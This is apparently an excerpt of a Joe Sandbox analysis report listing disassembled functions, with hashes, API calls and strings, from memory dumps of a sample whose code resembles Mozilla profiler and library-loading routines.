Function 61E2D65B Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80444b7a1f9c336b8ddf7ede844ef2572c4fef74faff3e978b08c37b414cddcf
Instruction ID: 214e4a77422a75c172c9c2064a368b9d1fba0603b708cc731de69edf92eb1139
Opcode Fuzzy Hash: 80444b7a1f9c336b8ddf7ede844ef2572c4fef74faff3e978b08c37b414cddcf
Instruction Fuzzy Hash: EEE0E678A042495FDB00DF65D4C054AB7B5FF48258B24C165DD484B305D231E995CBC1

Function 61E2D981 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7741dc5002cb162032dfd22e15b2f11181b9a78a06ce5ec405677c32640a3b74
Instruction ID: 0770371ec9a44e43cdd5cf4ef26b08e67e6dab9ce041578c4bbee247c5ef0355
Opcode Fuzzy Hash: 7741dc5002cb162032dfd22e15b2f11181b9a78a06ce5ec405677c32640a3b74
Instruction Fuzzy Hash: 54E0B6B550531DAFCB00CF09D8849CABBA8FB08260F10811AFD145B301C371E910CBE0

Function 61E2D916 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84b9b301cd6fe802102ace05a8f3f54127e45f3cfeb9e9c857c71b75d53a3f46
Instruction ID: 945e16ab1c4606d0450c898c0f973b63cf6ac8bb22533ea61b57455de4454874
Opcode Fuzzy Hash: 84b9b301cd6fe802102ace05a8f3f54127e45f3cfeb9e9c857c71b75d53a3f46
Instruction Fuzzy Hash: B1E0B6B550531DAFCB00CF09D8809CABBA8FB08364F10811AFD145B301C371E950CBE0

Function 61E2D8E7 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bebc2205bf665d9e62f953e7dddfa37ec45d91e25232bda72014aaaf6124a9de
Instruction ID: 3559d1c802e24a9b256d38bd1c0691e015ce79746017865ea9437725e8f07286
Opcode Fuzzy Hash: bebc2205bf665d9e62f953e7dddfa37ec45d91e25232bda72014aaaf6124a9de
Instruction Fuzzy Hash: DCE002B950535DAFDB00CF09D894ADABBA8FB09264F50811AFD1857301C375E961CBE1

Function 61E2D8B8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bc46c8122d7ec2c0d3e85d99e06002b58141c25f7dac85a939e33f12ea64f0c
Instruction ID: 0c6bb8ec670fbf06178dafeec3c5f151ae9a42d8b6ea8cc00f9de22d3b6fc0e1
Opcode Fuzzy Hash: 4bc46c8122d7ec2c0d3e85d99e06002b58141c25f7dac85a939e33f12ea64f0c
Instruction Fuzzy Hash: 83E0B6B550531DAFCB00CF09D880ACABBA8FB08260F10811AFD145B300C371E910CBE0

Function 61E2D635 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce01ef94e47e0f3b5e3022edffbc238ed3a861089da3a055ee794e226609d537
Instruction ID: e794d2b72a1fc6c6090aef49fcd2ae8b4ab6f64d521491744c60cc3bf2b3839a
Opcode Fuzzy Hash: ce01ef94e47e0f3b5e3022edffbc238ed3a861089da3a055ee794e226609d537
Instruction Fuzzy Hash: 8ED092B8909349AFCB00EF29C48544EBBE4BF88258F40C82DFC98C7311E274E8408F92

Function 61E038DC Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40af0c36dbf5a0f884e18cc3b6e49f381d70d038c9458a678f14876bb3249447
Instruction ID: 5d8a4dcf50b240acca679c383b9083a7302e11f974503154b2c6ec1cc823b236
Opcode Fuzzy Hash: 40af0c36dbf5a0f884e18cc3b6e49f381d70d038c9458a678f14876bb3249447
Instruction Fuzzy Hash: D9C01230244308CFEB40CAAED480A62B3E9BB44A24F50C0A0E808CB340DA30F9118690

Function 61E038CA Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40cad0428ba2cec2f3835856280400d4fd42dbc754fd2a6d6e7cded720f8f0bd
Instruction ID: 67d68dba2000bb8482a24fc023f268fc16b477c73c548bd02e1b99648bc578f6
Opcode Fuzzy Hash: 40cad0428ba2cec2f3835856280400d4fd42dbc754fd2a6d6e7cded720f8f0bd
Instruction Fuzzy Hash: C9B09B2071430D565708CE549440977779DB784905724C455D81C85505E735E59152D0

Function 61E037F3 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c758f56ce800b0edb1a3b6b4920dd8d203c929418ffadd695cc457fe8d80d330
Instruction ID: de6271d013a038b850d850acc4260bf908e6486e870890920c4c51f453ae2ee2
Opcode Fuzzy Hash: c758f56ce800b0edb1a3b6b4920dd8d203c929418ffadd695cc457fe8d80d330
Instruction Fuzzy Hash: C7B0123B11030CCB4700DD0DD441CC1B3D8F708E127C104D0E41087701D669F800C685

Function 6D58CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6D55582D), ref: 6D58CC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6D55582D), ref: 6D58CC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6D5BFE98,?,?,?,?,?,6D55582D), ref: 6D58CC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6D55582D), ref: 6D58CC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6D55582D), ref: 6D58CC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6D55582D), ref: 6D58CC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6D55582D), ref: 6D58CCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6D58CCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6D58CCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6D58CCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6D58CCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6D58CD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6D58CD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6D58CD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6D58CDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6D58CDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6D58CDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6D58CDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6D58CE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6D58CE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6D58CE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6D58CE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6D58CE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6D58CE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6D58CE8A

Strings

ipcmessages, xrefs: 6D58CDBE
cpuallthreads, xrefs: 6D58CE16
jsallocations, xrefs: 6D58CD0E
notimerresolutionchange, xrefs: 6D58CE00
Unrecognized feature "%s"., xrefs: 6D58CEA0
unregisteredthreads, xrefs: 6D58CE58
stackwalk, xrefs: 6D58CCF8
processcpu, xrefs: 6D58CE6E
java, xrefs: 6D58CC37
fileioall, xrefs: 6D58CCA8
screenshots, xrefs: 6D58CCD4
mainthreadio, xrefs: 6D58CC7C
samplingallthreads, xrefs: 6D58CE2C
power, xrefs: 6D58CE84
seqstyle, xrefs: 6D58CCE6
markersallthreads, xrefs: 6D58CE42
default, xrefs: 6D58CC21
leaf, xrefs: 6D58CC66
fileio, xrefs: 6D58CC92
preferencereads, xrefs: 6D58CD92
nativeallocations, xrefs: 6D58CDA8
noiostacks, xrefs: 6D58CCBE
audiocallbacktracing, xrefs: 6D58CDD4
nostacksampling, xrefs: 6D58CD7C

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: d8ce52268f81bca1d1d439f5af4907261fccc9be9c85a623fd78dc4889ba0068
Instruction ID: f03b34ee7730691dd8570b582a36bfd37f91cf9c31a4e4cc1a4135696640cc15
Opcode Fuzzy Hash: d8ce52268f81bca1d1d439f5af4907261fccc9be9c85a623fd78dc4889ba0068
Instruction Fuzzy Hash: 1B51ACC195A27652FB0E613B6C30B7A1405EFD3286F40C53AEE07A1D83FB15B64586B7

Function 6D554470 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6D554730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6D5544B2,6D5CE21C,6D5CF7F8), ref: 6D55473E
Part of subcall function 6D554730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6D55474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6D5544BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6D5544D2
InitOnceExecuteOnce.KERNEL32(6D5CF80C,6D54F240,?,?), ref: 6D55451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6D55455C
LoadLibraryW.KERNEL32(?), ref: 6D554592
InitializeCriticalSection.KERNEL32(6D5CF770), ref: 6D5545A2
InitOnceExecuteOnce.KERNEL32(6D5CF818,6D54F240,?,?), ref: 6D554612
LoadLibraryW.KERNEL32(user32.dll), ref: 6D554644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6D55466D
VerSetConditionMask.NTDLL ref: 6D55469F
VerSetConditionMask.NTDLL ref: 6D5546AB
VerSetConditionMask.NTDLL ref: 6D5546B2
VerSetConditionMask.NTDLL ref: 6D5546B9
VerSetConditionMask.NTDLL ref: 6D5546C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6D5546CD
GetModuleHandleW.KERNEL32(00000000), ref: 6D5546F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6D5546FD

Strings

G\m, xrefs: 6D5544FC
NativeNtBlockSet_Write, xrefs: 6D5546F7
l, xrefs: 6D554578
kernel32.dll, xrefs: 6D5544CD
WRusr.dll, xrefs: 6D5544B5
user32.dll, xrefs: 6D554557, 6D55463F

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProc$CriticalInfoInitializeSectionVerifyVersionmemset
String ID: G\m$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 545401598-2347050185
Opcode ID: 5c67a77aeec2531daeb0b071f0f38d9bbd88fb8c14d38ae616abf92c3d7d2c0e
Instruction ID: 7d5c8c13111c73a9677aef3af3070b642b013eb74fa5b0760841912c31c7250e
Opcode Fuzzy Hash: 5c67a77aeec2531daeb0b071f0f38d9bbd88fb8c14d38ae616abf92c3d7d2c0e
Instruction Fuzzy Hash: 526127B0904348AFEF199F60CC49BA97BF8EF4A708F01C45EE5059BA42D7B09961CF52

Function 6D5547C0 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 232threadCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6D554801
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6D554817
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6D55482D
__Init_thread_footer.LIBCMT ref: 6D55484A

Part of subcall function 6D57AB3F: EnterCriticalSection.KERNEL32(6D5CE370,?,?,6D543527,6D5CF6CC,?,?,?,?,?,?,?,?,6D543284), ref: 6D57AB49
Part of subcall function 6D57AB3F: LeaveCriticalSection.KERNEL32(6D5CE370,?,6D543527,6D5CF6CC,?,?,?,?,?,?,?,?,6D543284,?,?,6D5656F6), ref: 6D57AB7C

Part of subcall function 6D565E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6D565EDB
Part of subcall function 6D565E90: memset.VCRUNTIME140(ewZm,000000E5,?), ref: 6D565F27
Part of subcall function 6D565E90: LeaveCriticalSection.KERNEL32(?), ref: 6D565FB2

GetCurrentThreadId.KERNEL32 ref: 6D55485F
GetCurrentThreadId.KERNEL32 ref: 6D55487E
AcquireSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D55488B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6D554956
ReleaseSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D55499A

Part of subcall function 6D57AB89: EnterCriticalSection.KERNEL32(6D5CE370,?,?,?,6D5434DE,6D5CF6CC,?,?,?,?,?,?,?,6D543284), ref: 6D57AB94
Part of subcall function 6D57AB89: LeaveCriticalSection.KERNEL32(6D5CE370,?,6D5434DE,6D5CF6CC,?,?,?,?,?,?,?,6D543284,?,?,6D5656F6), ref: 6D57ABD1

Strings

MOZ_BASE_PROFILER_LOGGING, xrefs: 6D554828
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6D554812
MOZ_PROFILER_SHUTDOWN, xrefs: 6D554A42
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6D5547FC
[I %d/%d] profiler_shutdown, xrefs: 6D554A06

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CriticalSection$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasefreememset
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
API String ID: 1027836844-4194431170
Opcode ID: 288dec869b70966a46aead025f5badb109bd0d744cf56148096cdf01eaa224e8
Instruction ID: fb0f073436b1bf8756ebcdc5113887abcaca8f7d68384b4c0ce890c45bcef9f9
Opcode Fuzzy Hash: 288dec869b70966a46aead025f5badb109bd0d744cf56148096cdf01eaa224e8
Instruction Fuzzy Hash: 2481E3719045018BDF1EDF68C89472A37B5BF8A328F12056ED91697E46E731E870CB92

Function 6D5519A0 Relevance: 37.2, APIs: 20, Strings: 1, Instructions: 407COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6D5CF760), ref: 6D5519BD
GetCurrentProcess.KERNEL32 ref: 6D5519E5
GetLastError.KERNEL32 ref: 6D551A27
memset.VCRUNTIME140(00000000,00000000,?), ref: 6D551A4F
GetLastError.KERNEL32 ref: 6D551A92
memset.VCRUNTIME140(00000000,00000000,?), ref: 6D551ABA
LocalFree.KERNEL32(?), ref: 6D551C69
CloseHandle.KERNEL32(?), ref: 6D551CAE
ReleaseSRWLockExclusive.KERNEL32(6D5CF760), ref: 6D551D52
GetLastError.KERNEL32 ref: 6D551DA5
GetLastError.KERNEL32 ref: 6D551DFB
GetLastError.KERNEL32 ref: 6D551E49
GetLastError.KERNEL32 ref: 6D551E68
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6D551E9B

Part of subcall function 6D552070: LoadLibraryW.KERNEL32(combase.dll,6D551C5F), ref: 6D5520AE
Part of subcall function 6D552070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6D5520CD
Part of subcall function 6D552070: __Init_thread_footer.LIBCMT ref: 6D5520E1

memset.VCRUNTIME140(?,00000000,00000110), ref: 6D551F15
VerSetConditionMask.NTDLL ref: 6D551F46
VerSetConditionMask.NTDLL ref: 6D551F52
VerSetConditionMask.NTDLL ref: 6D551F59
VerSetConditionMask.NTDLL ref: 6D551F60
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6D551F6D

Strings

D, xrefs: 6D551B57

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: ErrorLast$ConditionMask$memset$ExclusiveLock$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersionfree
String ID: D
API String ID: 208359514-2746444292
Opcode ID: 2153d1a1f93ab624a8b8a3d42f413c0a27df2fefdecc27c2dc2cda6832f6ffad
Instruction ID: b6c373b109534921b2c448fd5fa1884c4757e933ad778349bebe90e0b77fc8f5
Opcode Fuzzy Hash: 2153d1a1f93ab624a8b8a3d42f413c0a27df2fefdecc27c2dc2cda6832f6ffad
Instruction Fuzzy Hash: 48F18071D00715ABEB259F64CC48FAABBB8FF49700F01459AE905E7A40E774AD90CFA1

Function 6D57D010 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 215COMMON

Download Yara Rule

APIs

